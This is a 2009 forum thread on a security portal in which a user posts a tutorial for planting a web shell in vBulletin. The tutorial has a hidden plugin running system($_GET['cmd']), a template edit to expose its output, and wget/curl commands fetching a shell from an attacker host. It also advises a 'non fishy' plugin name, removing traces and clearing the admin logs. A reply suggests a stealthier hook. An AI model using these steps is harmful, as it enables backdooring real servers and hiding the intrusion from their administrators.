 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 109
 Members: 0
 Total: 109
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Uploading shells in vbulletin |
|
 Posted: Mon Dec 07, 2009 9:46 pm |
 |
|
| saiflol |
| Beginner |
 |
|
| Joined: Dec 07, 2009 |
| Posts: 2 |
|
|
|
 |
|
 |
|
A tuto for uploading shells in vbulletin
Requirements:
- Admin Access
- A brain
Tutorial
1. Log into the admin cp.
2. Under 'Plugins & Products' select Add New Plugin
3. Set the settings as follows:
Product : vBulletin
Hook Location : global_start
Title : (Anything non fishy.. I use 'DEFAULT PLUG')
Execution Order : 5
Plugin PHP Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean();
Plugin is Active : Yes
--------------------
So in the end, it should look like this:
http://img291.imageshack.us/img291/9845/screenxd3.png
4. After the plugin is added, go to under 'Styles & Templates', select 'Style Manager'
5. Under whatever the default style is, in the drop down menu select Edit Templates.
6. Scroll to ForumHome Templates and expand it. Click on [CUSTOMIZE] next to FORUMHOME.
7. Look for
$header
somewhere near the top. Replace it with:
$header
$execcode
8. Go to the main forum page... You should see it saying, "Cannot execute blank command" somewhere on the page. If you see "System() has been disabled" or anything like that, then it's a shitty server, forget it.
9. Now go to the forum and add the following after index.php
?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php
So it would look like
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php
What this does, is downloads shell.txt, and renames it to shell.php.
Now, the shell should be located in shell.php in the forums directory... If not, then wget is disabled on this server, you can try some alternate methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.evilshell.com/shell.txt > shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.evilshell.com/shell.txt shell.php
After you have your real shell on there, remove the plugin, and remove the $execcode from the FORUMHOME section of the template.
Dont forget to clear your admin logs |
|
|
|
|
|
|
|
|
| Posted: Tue Dec 08, 2009 5:44 pm |
|
|
| capt |
| Advanced user |
 |
|
| Joined: Nov 04, 2008 |
| Posts: 232 |
|
|
|
|
|
|
|
| nice but you could just use ajax_complete for the hook and use simple php code to get it to do the same thing. In this one you have to edit template and sometimes in the php.ini under disabled_function kills system() commands. |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
